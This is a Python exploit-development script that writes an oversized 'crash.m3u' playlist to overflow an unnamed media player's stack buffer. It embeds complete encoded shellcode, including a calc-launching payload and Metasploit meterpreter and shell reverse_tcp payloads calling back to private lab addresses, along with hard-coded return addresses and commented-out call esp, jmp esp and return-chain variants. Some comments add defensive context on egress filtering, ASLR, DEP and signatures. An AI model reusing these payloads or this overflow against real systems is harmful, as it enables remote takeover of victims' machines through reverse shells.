from struct import *

# calcCorelan: 144-byte opaque x86 payload blob, reproduced byte-for-byte.
# The name suggests a calculator-launching proof-of-concept payload, but this
# file does not record how the blob was produced, so treat that as unverified.
# Detection note: the blob contains the FPU get-PC sequence d9 74 24 f4
# (fnstenv [esp-0xc]), a byte pattern that signature rules commonly match.
# NOTE(review): the same name is rebound to the same 144 bytes further down,
# and only commented-out write variants at the end of the file reference it.
calcCorelan = (
    b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
    b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
    b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
    b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
    b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
    b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
    b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
    b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
    b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
    b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
    b"\x7f\xe8\x7b\xca"
)

# meterpreter: 317-byte encoded payload blob, reproduced byte-for-byte.
# Provenance as recorded by the author:
#   msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
# Defensive context:
# - reverse_tcp means the host that runs this connects OUT to LHOST:LPORT, so
#   egress filtering and monitoring of outbound connections are the network
#   controls that apply.
# - 192.168.0.10 is an RFC 1918 private address; as an indicator it only has
#   meaning inside the author's own lab network.
# - The blob contains the FPU get-PC sequence d9 74 24 f4 (fnstenv [esp-0xc]),
#   a byte pattern that signature rules commonly match.
# Only commented-out write variants at the end of the file reference this name.
meterpreter = (
    b"\xda\xd5\xd9\x74\x24\xf4\x5f\x2b\xc9\xba\xd1\x89\x9d"
    b"\x27\xb1\x49\x31\x57\x19\x03\x57\x19\x83\xc7\x04\x33"
    b"\x7c\x61\xcf\x3a\x7f\x9a\x10\x5c\x09\x7f\x21\x4e\x6d"
    b"\x0b\x10\x5e\xe5\x59\x99\x15\xab\x49\x2a\x5b\x64\x7d"
    b"\x9b\xd1\x52\xb0\x1c\xd4\x5a\x1e\xde\x77\x27\x5d\x33"
    b"\x57\x16\xae\x46\x96\x5f\xd3\xa9\xca\x08\x9f\x18\xfa"
    b"\x3d\xdd\xa0\xfb\x91\x69\x98\x83\x94\xae\x6d\x39\x96"
    b"\xfe\xde\x36\xd0\xe6\x55\x10\xc1\x17\xb9\x43\x3d\x51"
    b"\xb6\xb7\xb5\x60\x1e\x86\x36\x53\x5e\x44\x09\x5b\x53"
    b"\x95\x4d\x5c\x8c\xe0\xa5\x9e\x31\xf2\x7d\xdc\xed\x77"
    b"\x60\x46\x65\x2f\x40\x76\xaa\xa9\x03\x74\x07\xbe\x4c"
    b"\x99\x96\x13\xe7\xa5\x13\x92\x28\x2c\x67\xb0\xec\x74"
    b"\x33\xd9\xb5\xd0\x92\xe6\xa6\xbd\x4b\x42\xac\x2c\x9f"
    b"\xf4\xef\x38\x6c\xca\x0f\xb9\xfa\x5d\x63\x8b\xa5\xf5"
    b"\xeb\xa7\x2e\xd3\xec\xc8\x04\xa3\x63\x37\xa7\xd3\xaa"
    b"\xfc\xf3\x83\xc4\xd5\x7b\x48\x15\xd9\xa9\xde\x45\x75"
    b"\x02\x9e\x35\x35\xf2\x76\x5c\xba\x2d\x66\x5f\x10\x46"
    b"\x0c\xa5\xf3\xa9\x78\xa5\x09\x42\x7a\xa6\x13\xf3\xf3"
    b"\x40\x41\xe3\x55\xda\xfe\x9a\xfc\x90\x9f\x63\x2b\xdd"
    b"\xa0\xe8\xdf\x21\x6e\x19\xaa\x31\x07\xe9\xe1\x68\x8e"
    b"\xf6\xdc\x07\x2f\x63\xda\x81\x78\x1b\xe0\xf4\x4f\x84"
    b"\x1b\xd3\xdb\x0d\x89\x9c\xb3\x71\x5d\x1d\x44\x24\x37"
    b"\x1d\x2c\x90\x63\x4e\x49\xdf\xbe\xe2\xc2\x4a\x40\x53"
    b"\xb6\xdd\x28\x59\xe1\x2a\xf7\xa2\xc4\xaa\xc4\x74\x21"
    b"\x29\x3c\xf3\x41\xf1"
)

# shell: 317-byte encoded payload blob, reproduced byte-for-byte.
# Provenance as recorded by the author:
#   msfpayload windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
# Defensive context:
# - reverse_tcp means the host that runs this connects OUT to LHOST:LPORT, so
#   egress filtering and monitoring of outbound connections are the network
#   controls that apply.
# - 192.168.0.10 is an RFC 1918 private address; as an indicator it only has
#   meaning inside the author's own lab network.
# - The blob contains the FPU get-PC sequence d9 74 24 f4 (fnstenv [esp-0xc]),
#   a byte pattern that signature rules commonly match.
# NOTE(review): nothing else in this file references this name, not even the
# commented-out write variants.
shell = (
    b"\xdd\xc1\xbb\xd3\xa3\x5c\x27\xd9\x74\x24\xf4\x58\x2b"
    b"\xc9\xb1\x49\x31\x58\x19\x03\x58\x19\x83\xc0\x04\x31"
    b"\x56\xa0\xcf\x3c\x99\x59\x10\x5e\x13\xbc\x21\x4c\x47"
    b"\xb4\x10\x40\x03\x98\x98\x2b\x41\x09\x2a\x59\x4e\x3e"
    b"\x9b\xd7\xa8\x71\x1c\xd6\x74\xdd\xde\x79\x09\x1c\x33"
    b"\x59\x30\xef\x46\x98\x75\x12\xa8\xc8\x2e\x58\x1b\xfc"
    b"\x5b\x1c\xa0\xfd\x8b\x2a\x98\x85\xae\xed\x6d\x3f\xb0"
    b"\x3d\xdd\x34\xfa\xa5\x55\x12\xdb\xd4\xba\x41\x27\x9e"
    b"\xb7\xb1\xd3\x21\x1e\x88\x1c\x10\x5e\x46\x23\x9c\x53"
    b"\x97\x63\x1b\x8c\xe2\x9f\x5f\x31\xf4\x5b\x1d\xed\x71"
    b"\x7e\x85\x66\x21\x5a\x37\xaa\xb7\x29\x3b\x07\xbc\x76"
    b"\x58\x96\x11\x0d\x64\x13\x94\xc2\xec\x67\xb2\xc6\xb5"
    b"\x3c\xdb\x5f\x10\x92\xe4\x80\xfc\x4b\x40\xca\xef\x98"
    b"\xf2\x91\x67\x6c\xc8\x29\x78\xfa\x5b\x59\x4a\xa5\xf7"
    b"\xf5\xe6\x2e\xd1\x02\x08\x05\xa5\x9d\xf7\xa6\xd5\xb4"
    b"\x33\xf2\x85\xae\x92\x7b\x4e\x2f\x1a\xae\xc0\x7f\xb4"
    b"\x01\xa0\x2f\x74\xf2\x48\x3a\x7b\x2d\x68\x45\x51\x46"
    b"\x02\xbf\x32\xa9\x7a\xbf\xc8\x41\x78\xc0\xd2\xf0\xf5"
    b"\x26\x80\xe2\x53\xf0\x3d\x9a\xfe\x8a\xdc\x63\xd5\xf6"
    b"\xdf\xe8\xd9\x07\x91\x18\x94\x1b\x46\xe9\xe3\x46\xc1"
    b"\xf6\xde\xed\xee\x62\xe4\xa7\xb9\x1a\xe6\x9e\x8e\x84"
    b"\x19\xf5\x84\x0d\x8f\xb6\xf2\x71\x5f\x37\x03\x24\x35"
    b"\x37\x6b\x90\x6d\x64\x8e\xdf\xb8\x18\x03\x4a\x42\x49"
    b"\xf7\xdd\x2a\x77\x2e\x29\xf5\x88\x05\xab\xca\x5e\x60"
    b"\x29\x3a\xd5\x80\xf1"
)
# buf: 308-byte encoded payload blob, reproduced byte-for-byte.
# Provenance as recorded by the author:
#   msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.74 lport=7777 -f python -e x86/shikata_ga_nai  -b '\x00\x09\x0d\xff\x0a'
# Defensive context:
# - reverse_tcp means the host that runs this connects OUT to lhost:lport, so
#   egress filtering and monitoring of outbound connections are the network
#   controls that apply.
# - 192.168.1.74 is an RFC 1918 private address; as an indicator it only has
#   meaning inside the author's own lab network.
# - The blob contains the FPU get-PC sequence d9 74 24 f4 (fnstenv [esp-0xc]),
#   a byte pattern that signature rules commonly match.
# Only a commented-out write variant at the end of the file references this name.
buf = (
    b"\xda\xd8\xd9\x74\x24\xf4\x58\xbf\x73\x1f\x91\xcb\x29"
    b"\xc9\xb1\x47\x83\xe8\xfc\x31\x78\x14\x03\x78\x67\xfd"
    b"\x64\x37\x6f\x83\x87\xc8\x6f\xe4\x0e\x2d\x5e\x24\x74"
    b"\x25\xf0\x94\xfe\x6b\xfc\x5f\x52\x98\x77\x2d\x7b\xaf"
    b"\x30\x98\x5d\x9e\xc1\xb1\x9e\x81\x41\xc8\xf2\x61\x78"
    b"\x03\x07\x63\xbd\x7e\xea\x31\x16\xf4\x59\xa6\x13\x40"
    b"\x62\x4d\x6f\x44\xe2\xb2\x27\x67\xc3\x64\x3c\x3e\xc3"
    b"\x87\x91\x4a\x4a\x90\xf6\x77\x04\x2b\xcc\x0c\x97\xfd"
    b"\x1d\xec\x34\xc0\x92\x1f\x44\x04\x14\xc0\x33\x7c\x67"
    b"\x7d\x44\xbb\x1a\x59\xc1\x58\xbc\x2a\x71\x85\x3d\xfe"
    b"\xe4\x4e\x31\x4b\x62\x08\x55\x4a\xa7\x22\x61\xc7\x46"
    b"\xe5\xe0\x93\x6c\x21\xa9\x40\x0c\x70\x17\x26\x31\x62"
    b"\xf8\x97\x97\xe8\x14\xc3\xa5\xb2\x70\x20\x84\x4c\x80"
    b"\x2e\x9f\x3f\xb2\xf1\x0b\xa8\xfe\x7a\x92\x2f\x01\x51"
    b"\x62\xbf\xfc\x5a\x93\xe9\x3a\x0e\xc3\x81\xeb\x2f\x88"
    b"\x51\x14\xfa\x1f\x02\xba\x55\xe0\xf2\x7a\x06\x88\x18"
    b"\x75\x79\xa8\x22\x5c\x12\x43\xd8\x36\xdd\x3c\xe3\x8c"
    b"\xb5\x3e\xe4\x0e\x27\xb6\x02\x44\xb7\x9e\x9d\xf0\x2e"
    b"\xbb\x56\x61\xae\x11\x13\xa1\x24\x96\xe3\x6f\xcd\xd3"
    b"\xf7\x07\x3d\xae\xaa\x81\x42\x04\xc0\x2d\xd7\xa3\x43"
    b"\x7a\x4f\xae\xb2\x4c\xd0\x51\x91\xc7\xd9\xc7\x5a\xbf"
    b"\x25\x08\x5b\x3f\x70\x42\x5b\x57\x24\x36\x08\x42\x2b"
    b"\xe3\x3c\xdf\xbe\x0c\x15\x8c\x69\x65\x9b\xeb\x5e\x2a"
    b"\x64\xde\x5e\x16\xb3\x26\x15\x76\x07"
)

# calcCorelan (second binding): 144-byte opaque x86 payload blob.
# This rebinds the name defined near the top of the file to the same 144
# bytes; the leading four bytes were split off from the rest so the author
# could try inserting extra bytes after them (the two disabled lines below).
# Only commented-out write variants at the end of the file reference it.
calcCorelan = (
    b"\xdb\xc0"
    b"\x31\xc9"
    #add = b"\x7c\x92\xc2\x45"
    #calcCorelan += b'\x75\x13\x39\x7e'
    b"\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
    b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
    b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
    b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
    b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
    b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
    b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
    b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
    b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
    b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
    b"\x7f\xe8\x7b\xca"
)

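# Build "crash.m3u": an oversized playlist file used as a crash / overflow
# test case. The parser it is aimed at is not named anywhere in this file.
#
# Layout of the active write (26080 bytes in total):
#   544   bytes of 0x90 (x86 NOP)
#   25532 bytes of 0xCC (x86 int3, which traps into an attached debugger)
#   4     bytes 13 22 80 7c, i.e. the little-endian value 0x7c802213
# 544 + 25532 = 26076, one of the offsets noted next to `junk`, so the last
# four bytes presumably land on the saved return address -- TODO confirm.
#
# Defensive notes:
# - Every address in the active and commented-out variants is a hard-coded
#   absolute value, so each one only holds where the module (or stack) sits
#   at that exact address; ASLR invalidates them.
# - The commented-out variants labelled "call esp" / "jmp esp" / "push esp ret"
#   rely on running bytes placed on the stack, which DEP/NX prevents.
# - The condition itself goes away once the parser bounds-checks the entry
#   length before copying it into a fixed-size buffer.

# Building blocks referenced only by the commented-out variants below.
junk = b'\xcc' * 25560  #26076     #26109 base
nop = b'\x90' * 196  #205 #196
pause = b'\xCC' * 4
futur = b'\x90' * 122  # 308;
eip = b'\x50\xFD\x10\x00'  # 50 -> +400 544

# The original opened the file and never closed it, leaving the flush to
# interpreter shutdown. The context manager closes it deterministically, and
# "wb" replaces "wb+" because the file is only ever written.
with open("crash.m3u", "wb") as crash:
    crash.write(b'\x90' * 544 + b'\xcc' * 25532 + b'\x13\x22\x80\x7c')

# Earlier variants, kept disabled exactly as the author left them.
#crash.write(b'\x90 + buf + nop + b'\x90'  * 11 + junk + eip)
#crash.write(b"\x90" * 880 + calcCorelan + b'\x90' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(b"\x90" * 650 + meterpreter + b'\xcc' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 4 + calcCorelan) # junk 26109 #overwrite EIP with call esp
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 12 + meterpreter) # junk 26109 #overwrite EIP with call esp
#crash.write(b'\x90'*156 + calcCorelan + b'\x90' * 25809 + b'\x5F\xDF\x87\x7C' + \
#b'XXXX' + b'\x90' * 8 + b'\x1B\x99\x80\x7C' + b'XXXX' + b'\x5F\xDF\x87\x7C' + b'XXXX' + b'\x90'*4 + b'\xC3\x43\x11\x00')
#pop eax ret			b'\x1B\x99\x80\x7C'  #pop eax pop ebp ret	b'\x5F\xDF\x87\x7C'  #jmp esp 	b'\xC3\x43\x11\x00'
#crash.write( junk + b'\x39\x10\x9C\x7C' + b'XXXX' + b'\x90' * 8 + calcCorelan) # push esp ret
#crash.write(junk + b'\x2F\x92\x84\7C' +  pause) # JMP DWORD SS:ESP FF24E4

# Reached only if the write and close above did not raise.
print("All OK")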